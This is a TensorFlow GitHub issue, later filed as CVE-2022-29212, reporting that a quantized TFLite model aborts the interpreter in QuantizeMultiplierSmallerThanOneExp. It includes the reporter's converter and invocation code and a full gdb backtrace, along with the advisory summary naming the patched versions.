TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling `QuantizeMultiplierSmallerThanOneExp`, the `TFLITE_CHECK_LT` assertion would trigger and abort the process. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

**System information**

* OS Platform and Distribution (e.g., Linux Ubuntu 16.04): **Linux Ubuntu 20.04**
* TensorFlow installed from (source or binary): **binary**
* TensorFlow version (or github SHA if from source): **2.4.0.dev20200929**

**Command used to run the converter or code if you’re using the Python API**

 import tensorflow as tf
 
 import numpy as np
 
 
 def wrap_frozen_graph(graph_def, inputs, outputs):
 def _imports_graph_def():
 tf.compat.v1.import_graph_def(graph_def, name="")
 wrapped_import = tf.compat.v1.wrap_function(_imports_graph_def, [])
 import_graph = wrapped_import.graph
 return wrapped_import.prune(
 tf.nest.map_structure(import_graph.as_graph_element, inputs),
 tf.nest.map_structure(import_graph.as_graph_element, outputs))
 
 
 graph_def = tf.compat.v1.GraphDef()
 _ = graph_def.ParseFromString(open('minimal_093011.pb', 'rb').read())
 dnn_function = wrap_frozen_graph(graph_def, inputs='import/first_graph_input:0', outputs='import_1/second_graph_output/Mean:0')
 converter = tf.lite.TFLiteConverter.from_concrete_functions([dnn_function])
 
 converter.experimental_enable_mlir_converter = True
 converter.optimizations = [tf.lite.Optimize.DEFAULT]
 converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, tf.lite.OpsSet.SELECT_TF_OPS]
 
 
 def representative_dataset_gen():
 image = np.random.randint(low=0, high=255, size=(1, 480, 640, 3), dtype='uint8')
 yield [image]
 
 
 converter.representative_dataset = representative_dataset_gen
 converter.inference_input_type = tf.uint8
 converter.inference_output_type = tf.uint8
 
 model = converter.convert()
 

**Link to Google Colab Notebook**

 https://colab.research.google.com/drive/1U8UVDl6lIs1zKjfpFc7hrr3jAo-0eh_i?usp=sharing
 

**Also, please include a link to the saved model or GraphDef**

 https://drive.google.com/file/d/1Hvr9hfvaxj3sBi0D0U0iAAe1kEaiJJWB/view?usp=sharing
 

**Failure details** 
The conversion is successful in that it generates a tflite graph. However, when I invoke the graph, I get a core dump error: 
\[1\] 511859 abort (core dumped) python src/reproduce\_minimal\_tflite\_test.py

**Code used to invoke the graph. Also included in Colab notebook linked above.**

 image = np.random.randint(low=0, high=255, size=(1, 480, 640, 3), dtype='uint8')
 
 tflite_model = tf.lite.Interpreter('models/minimal_093011.tflite')
 tflite_model.allocate_tensors()
 
 input_details = tflite_model.get_input_details()
 tflite_model.set_tensor(input_details[0]['index'], image)
 tflite_model.invoke()
 

**Traceback**

 #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 
 #1 0x00007ffff7dc0859 in __GI_abort () at abort.c:79 
 #2 0x00007fffb9386e42 in tflite::QuantizeMultiplierSmallerThanOneExp(double, int*, int*) () 
 from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #3 0x00007fffb9158090 in void tflite::ops::builtin::comparisons::(anonymous namespace)::ComparisonQuantized<signed char, &(bool tflite::reference_ops::GreaterFn<int>(int, int))>(TfLiteTensor const*, TfLiteTensor const*, TfLiteTensor*, bo
 ol) () from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #4 0x00007fffb9158b7e in tflite::ops::builtin::comparisons::(anonymous namespace)::GreaterEval(TfLiteContext*, TfLiteNode*) () 
 from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #5 0x00007fffb9369713 in tflite::Subgraph::Invoke() () from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #6 0x00007fffb936c1f0 in tflite::Interpreter::Invoke() () from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #7 0x00007fffb90f7548 in tflite::interpreter_wrapper::InterpreterWrapper::Invoke() () 
 from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #8 0x00007fffb90eb6ee in pybind11::cpp_function::initialize<pybind11_init__pywrap_tensorflow_interpreter_wrapper(pybind11::module&)::{lambda(tflite::interpreter_wrapper::InterpreterWrapper&)#6}, pybind11::object, tflite::interpreter_wrap
 per::InterpreterWrapper&, pybind11::name, pybind11::is_method, pybind11::sibling>(pybind11_init__pywrap_tensorflow_interpreter_wrapper(pybind11::module&)::{lambda(tflite::interpreter_wrapper::InterpreterWrapper&)#6}&&, pybind11::object (*
 )(tflite::interpreter_wrapper::InterpreterWrapper&), pybind11::name const&, pybind11::is_method const&, pybind11::sibling const&)::{lambda(pybind11::detail::function_call&)#3}::_FUN(pybind11::detail::function_call) () 
 from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #9 0x00007fffb90ecb39 in pybind11::cpp_function::dispatcher(_object*, _object*, _object*) () 
 from /home/yousef/miniconda3/envs/tf2.3/lib/python3.7/site-packages/tensorflow/lite/python/interpreter_wrapper/_pywrap_tensorflow_interpreter_wrapper.so 
 #10 0x00005555556b9914 in _PyMethodDef_RawFastCallKeywords (method=0x55555694b100, self=0x7fffbb8c9270, args=0x7fffaf04dd98, nargs=<optimised out>, kwnames=<optimised out>) 
 at /tmp/build/80754af9/python_1598874792229/work/Objects/call.c:693 
 #11 0x00005555556b9a31 in _PyCFunction_FastCallKeywords (func=0x7fffc08de460, args=<optimised out>, nargs=<optimised out>, kwnames=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Objects/call.c:732 
 #12 0x000055555572639e in call_function (kwnames=0x0, oparg=<optimised out>, pp_stack=<synthetic pointer>) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:4619 
 #13 _PyEval_EvalFrameDefault (f=<optimised out>, throwflag=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:3093 
 #14 0x00005555556b8e7b in function_code_fastcall (globals=<optimised out>, nargs=1, args=<optimised out>, co=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Objects/call.c:283 
 #15 _PyFunction_FastCallKeywords (func=<optimised out>, stack=0x7ffff6d615c0, nargs=1, kwnames=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Objects/call.c:408 
 #16 0x0000555555721740 in call_function (kwnames=0x0, oparg=<optimised out>, pp_stack=<synthetic pointer>) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:4616 
 #17 _PyEval_EvalFrameDefault (f=<optimised out>, throwflag=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:3110 
 #18 0x0000555555668829 in _PyEval_EvalCodeWithName (_co=0x7ffff6cfa1e0, globals=<optimised out>, locals=<optimised out>, args=<optimised out>, argcount=<optimised out>, kwnames=0x0, kwargs=0x0, kwcount=0, kwstep=2, defs=0x0, defcount=0, 
 kwdefs=0x0, closure=0x0, name=0x0, qualname=0x0) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:3930 
 #19 0x0000555555669714 in PyEval_EvalCodeEx (_co=<optimised out>, globals=<optimised out>, locals=<optimised out>, args=<optimised out>, argcount=<optimised out>, kws=<optimised out>, kwcount=0, defs=0x0, defcount=0, kwdefs=0x0, 
 closure=0x0) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:3959 
 #20 0x000055555566973c in PyEval_EvalCode (co=<optimised out>, globals=<optimised out>, locals=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Python/ceval.c:524 
 #21 0x0000555555780f14 in run_mod (mod=<optimised out>, filename=<optimised out>, globals=0x7ffff6dcac30, locals=0x7ffff6dcac30, flags=<optimised out>, arena=<optimised out>) 
 at /tmp/build/80754af9/python_1598874792229/work/Python/pythonrun.c:1035 
 #22 0x000055555578b331 in PyRun_FileExFlags (fp=0x5555558c3100, filename_str=<optimised out>, start=<optimised out>, globals=0x7ffff6dcac30, locals=0x7ffff6dcac30, closeit=1, flags=0x7fffffffdd80) 
 at /tmp/build/80754af9/python_1598874792229/work/Python/pythonrun.c:988 
 #23 0x000055555578b523 in PyRun_SimpleFileExFlags (fp=0x5555558c3100, filename=<optimised out>, closeit=1, flags=0x7fffffffdd80) at /tmp/build/80754af9/python_1598874792229/work/Python/pythonrun.c:429 
 #24 0x000055555578c655 in pymain_run_file (p_cf=0x7fffffffdd80, filename=0x5555558c2870 L"src/reproduce_minimal_tflite_test.py", fp=0x5555558c3100) at /tmp/build/80754af9/python_1598874792229/work/Modules/main.c:462 
 #25 pymain_run_filename (cf=0x7fffffffdd80, pymain=0x7fffffffde90) at /tmp/build/80754af9/python_1598874792229/work/Modules/main.c:1652 
 #26 pymain_run_python (pymain=0x7fffffffde90) at /tmp/build/80754af9/python_1598874792229/work/Modules/main.c:2913 
 #27 pymain_main (pymain=0x7fffffffde90) at /tmp/build/80754af9/python_1598874792229/work/Modules/main.c:3460 
 #28 0x000055555578c77c in _Py_UnixMain (argc=<optimised out>, argv=<optimised out>) at /tmp/build/80754af9/python_1598874792229/work/Modules/main.c:3495 
 #29 0x00007ffff7dc20b3 in __libc_start_main (main=0x555555649c90 <main>, argc=2, argv=0x7fffffffdff8, init=<optimised out>, fini=<optimised out>, rtld_fini=<optimised out>, stack_end=0x7fffffffdfe8) at ../csu/libc-start.c:308 
 #30 0x0000555555730ff0 in _start () at ../sysdeps/x86_64/elf/start.S:103

CVE-2022-29212: Core dumped when invoking TFLite model converted using latest nightly TFLite converter (2.4.0dev2020929) · Issue #43661 · tensorflow/tensorflow

Tag

#google